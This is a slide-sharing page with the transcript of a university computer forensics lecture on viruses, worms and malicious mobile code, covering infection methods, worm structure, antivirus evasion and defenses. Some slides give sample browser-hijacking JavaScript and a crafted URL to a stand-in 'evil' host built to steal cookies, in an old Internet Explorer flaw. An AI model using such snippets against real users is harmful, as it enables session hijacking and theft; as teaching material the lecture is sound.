1 / 179

Viruses, Worms, Mobile Code

Viruses, Worms, Mobile Code. COEN 252 / 152: Computer Forensics. Virus: The Principle. Virus attaches itself to a host that can execute instructions contained in the virus. When the host is invoked, the virus copies itself to other locations on the system. Executables.

andralyn
Download Presentation

Viruses, Worms, Mobile Code

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Viruses, Worms, Mobile Code COEN 252 / 152: Computer Forensics

  2. Virus: The Principle • Virus attaches itself to a host that can execute instructions contained in the virus. • When the host is invoked, the virus copies itself to other locations on the system.

  3. Executables • Companion Infection Technique • OS will call the virus when the user requests the companion file. • Windows: • Virus is Notepad.com to hide as Notepad.exe. • Set the hidden attribute to prevent the virus from being seen. • Launch the true notebook.exe file from the virus. • If the user selects Start  Run and types in notebook, then windows starts the virus (notebook.com instead of notebook.exe)

  4. Executables • Companion Infection Technique • Windows: • Virus renames Notepad.exe to Notepad.ex_ and hides it. • Virus takes the place of Notepad.exe. • Works with shortcuts. • Used in the Trilisa virus / worm (2002)

  5. Executables • Companion Infection Technique • Virus uses alternate data stream feature of NTFS: • Streams look like one file in explorer and directory listings. • System activates the default stream, the virus. • Virus calls alternate stream. • Win2KStream Virus (2000)

  6. Executables • Overwriting Techniques • Virus replaces part of an executable. • Usually the executable looses functionality. • Users will now that there is something wrong. • Prepending Techniques • Virus placed in front of executable. • After virus executes, host program is called. • Very easy for .com files. • Easy to clean files. • Bliss virus had a disinfect mode built into it. • Used by the NIMDA worm.

  7. Executables • Appending Infection Technique • Insert itself at the end of host file. • Add a jump at the beginning of host file. • Stealth Techniques for Prepending and Appending: • Compress host. • When virus calls hosts, host is uncompressed into RAM. • Fill up total package (virus, compressed host) to same size as original host. • Change filler so that checksum is not changed.

  8. Boot Sector Modification • Target Master Boot Record or Partition Boot Sector. • Michelangelo Virus (1991). • Replaced MBR boot strap to elsewhere on disk. • First the virus loads itself into memory, then it passes control to the original MBR boot sector. • Places itself into all boot sector of all floppies. • Memory-resident copy of the virus is attached to low-level BIOS drivers. • Gets called when these are executed. • Can no longer spread under WinNT, Win2K, WinXP, only wreak havoc, e.g. by overwriting the sectors right after the partition boot sector.

  9. Boot Sector Modification • Michelangelo Virus (1991). Bios initializes hardware and starts drivers. MBR executes and reads partition table. PBS locates OS start files.

  10. Infection of Document Files • Many software use Macros: • MS Office, WordPerfect Office, StarOffice, OpenOffice, AutoCAD, Excel, … • WinOffice runs code in subroutines • Document_Open() • Document_Close() • AutoExec() • …. • These subroutines are executed with every document.

  11. Infection of Document Files • Melissa (1999): • Resides in Document_Open() • Copies itself into the Normal.dot file. • Normal.dot is processed whenever MS Office starts up. • Melissa changed the Document_Close() routine. http://www.cert.org/advisories/CA-1999-04.html

  12. Infection of Document Files • Excel Version: • Virus infects Personal.xls • This file can contains macros and is used whenever excel runs. • Laroux (1996) used auto_open() subroutine to execute whenever an excel file was opened.

  13. Infection of Document Files • Frequent macro targets in MS Office: • AutoExec() • AutoClose() • AutoOpen() • AutoNew() • AutoExit() • FileClose() • FileOpen() • FileNew()

  14. Other Targets • Source Code • Scripts • Visual Basic Scripts (.vbs) used by OS: • Startup.vbs • Exec.vbs • Shell scripts, Perl scripts • Java Class Files • Platform independent viruses

  15. Propagation Techniques • Removable Storage • Boot sector viruses, executable viruses • Yamaha’s CD-R drive firmware update contained the Chernobyl virus. • Email attachments • Shared directories • Windows file sharing via Server Message Block (SMB) protocol. • Network File System shares • P2P services such as Gnutella or Morpheus

  16. Anti-Virus Defense • Antivirus software on gateways: • User workstations • File servers • Mail servers • Application servers • Border firewalls • Handhelds.

  17. Anti-Virus Defense • Virus signatures • Looks for small patterns indicative of a known virus. • Polymorphic viruses • Heuristics • Looks for programs with bad behavior: • Attempts to access the boot sector • Attempts to locate all files in a directory • Attempts to write to an exe file • Attempts to delete hard drive contents • …

  18. Anti-Virus Defense • Integrity Verification • Generate database of hashes of important files. • Recalculate these hashes and compare them to known values. • Configuration Hardening • Least privilege • Minimize active components. • Set warnings (e.g. against macros) • User education

  19. Anti-Anti-Virus Defense • Stealthing • Hide virus files. • Intercept scanning of infected files. • Slow rate of infection. • … • Polymorphism and Metamorphism • Change order of instructions in virus code • Use equivalent code (increment = subtracting with -1) • Encryption of most of the virus body. • Slightly change functionality of virus as it spreads.

  20. Anti-Anti-Virus Defense • Antivirus software deactivation • Kill processes known to be antivirus processes. • Disable internet access to antivirus vendor’s pages. • Change security settings (e.g. allow Word macros to run)

  21. Worms Worms: • Propagates across a network • Typically, does not require user action for propagation. Virus: • Infects files. • Typically requires user interaction.

  22. Worms Worm Components • Warhead • Propagation Engine • Target Selection Algorithm • Scanning Engine • Payload

  23. Worm Warhead • A piece of code that exploits a vulnerability on the target system • Exploits such as Buffer Overflow Exploits • File Sharing Attacks • E-mail • Common Misconfigurations

  24. Worm Propagation Engine • After gaining access, the worm must transfer itself to the target machine. • Some worms are completely contained in the warhead. • File Transfer Mechanisms • FTP • TFTP • HTTP • SMB (MS Server Message Block) • Windows file sharing • Unix servers running SAMBA

  25. Worm Target Selection Algorithm • Once the worm has gained control of a target, it starts looking for new targets. • E-mail addresses • Host lists • Trusted Systems • Network Neighborhood • DNS queries • Randomly selected ip address.

  26. Worm Scanning Engine • Once targets are identified, the worm scans for the original vulnerability.

  27. Worm Payload • Some specific action done on behalf of the attacker. • Opening up a backdoor. • Planting a distributed denial of service attack. • Performing complex calculations: • password cracking • math research (actually happened)

  28. Worm Spread • Worm spread is limited • Diversity of machines • Tiny worm • targeted only machines running security software from a medium company • was successful in infecting most machines. • Worms can contain support for multiple entry methods. • Too many victims crash • Fast worms can cause network congestion

  29. Worm Trends • Multiplatform worms • Multiexploit worms • Zero-day exploit worms • No chance to patch • Fast-spreading worms: Warhol / Flash • pre-scan targets • Polymorphic worms • Change appearance • Metamorphic worms • Change functionality

  30. Worm Defenses • Ethical (?) Worms • Antivirus tools • Fast patching services • Firewalling • Block arbitrarily outbound connections • Prevents spreading • Establishment of Incident Response Capabilities

  31. Malicious Mobile Code • Mobile Code • Light-weight code that is downloaded from a remote system and executed locally with none or little user intervention. • Examples: • Java Applets • JavaScripts • Visual Basic Scripts • Active X controls

  32. Malicious Mobile Code • Targets of malicious codes: • Monitoring of browser activities. • Obtaining access to file system. • Infection with a Trojan horse. • Hijacking web browser. • …

  33. Malicious Mobile Code • Target Applications • Web-browsers (most important target) • E-mail readers • Either directly or because they use the installed browser to read html messages. • XML-based protocols • Web Service Architecture

  34. Malicious Mobile Code • Browser scripts: • Use scripting languages such as JavaScript, JScript, VBScript, …

  35. Malicious Mobile Code • Attack code • Can exhaust resources. • By creating an infinite series of dialogue boxes. • By creating a form and fill in an infinite number of characters. • Hijack the browser.

  36. Malicious Mobile Code • Browser Hijacking • Use the onunload( ) function: • <body onunload=“window.open(‘trap.html’))”> • Can be enhanced by resizing the window to fill the screen: • self.moveTo(0,0); • self.resizeTo(screen.availWidth,screen.availHeight); • Can be enhanced with popup windows. • Add bookmarks: • window.external.addFavorite(‘http://www.cse.scu’,’Info’);

  37. Malicious Mobile Code • Stealing cookies via browser vulnerabilities • Browser automatically supplies cookies associated with the domain of that website.

  38. Malicious Mobile Code • IE 5.01 vulnerability: • Create server-side program capable of reading cookies. • Compose a URL that would fool the browser into thinking that the site visited belongs to a different domain. http:// evil.site.com%2fget_cookies.html%3f.boa.com is translated into http://evil.site.com/get_cookies.html?.boa.com • IE 5.01 would think that the top URL belongs to the boa domain and provide the cookies.

  39. Malicious Mobile Code • Capturing cookies • With tricky URLs (see above) • URL can be hidden in a javascript command or in a hidden region of html code.

  40. Malicious Mobile Code • Mozilla had a vulnerability that executed javascript in the URL.

  41. Malicious Mobile Code • Browsers allow Javascript in URL if preceded by javascript:

  42. Malicious Mobile Code • Browsers allow Javascript in URL if preceded by javascript. • Change javascript in URL to retrieve cookies.

  43. Malicious Mobile Code • XSS (cross scripting) attack • Authors injects malicious code into a website. • Browsers of visitors to this website will execute the code.

  44. Malicious Mobile Code • XSS (cross scripting) attack • Vulnerable search engine does not strip out the JavaScript script: • Search engine sends the script back to victim’s browser. • Victim’s browser executes JavaScript. • Browser pop-ups alert with cookie values. • Attacker needs to trick the victim into using this URL.

  45. Malicious Mobile Code • XSS (cross scripting) attack • Assume victim has interactions with a vulnerable website. • Attacker crafts a link, sends it to the victim (e.g. via email) and tricks the victim into clicking on the link. • Victims browser uses the attacker-provided URL to go to the vulnerable web server. • Web server “reflects” JavaScript back to victim’s browser. • Victim’s browser executes JavaScript (because it trusts the vulnerable web server.) • Attack JavaScript payload might be transmission of cookies. • Cookies can then be used to hijack a session, …

  46. Malicious Mobile Code • XSS (cross scripting) attack • Malicious script can also be embedded in html documents.

  47. Malicious Mobile Code • Script sends invisible request to evil.scu.edu containing cookies. • Attacker’s cgi script on the evil side processes the cookies. • Stolen cookies can be used to clone connections.

  48. Malicious Mobile Code • Defenses on Server Side • Input filtering • Remember, all input is (potentially) evil. • This is very hard, since scripts can be hidden very well. • Output filtering • The attack scripts needs to be reflected to the victim. So, this works.

  49. Malicious Mobile Code • Defenses on Client (= Browser) side • Never surf the internet with administrator privileges. • Disable scripts. • IE explorer introduced security zones.

  50. Malicious Mobile Code • Active X Controls • Part of Common Object Model COM • Have the same powers as a normal program • Microsoft Agent allows inclusion of animated and interactive cartoon characters in web pages. • Are executed with the same permission set as the browser. • E.g. administrator privileges.

More Related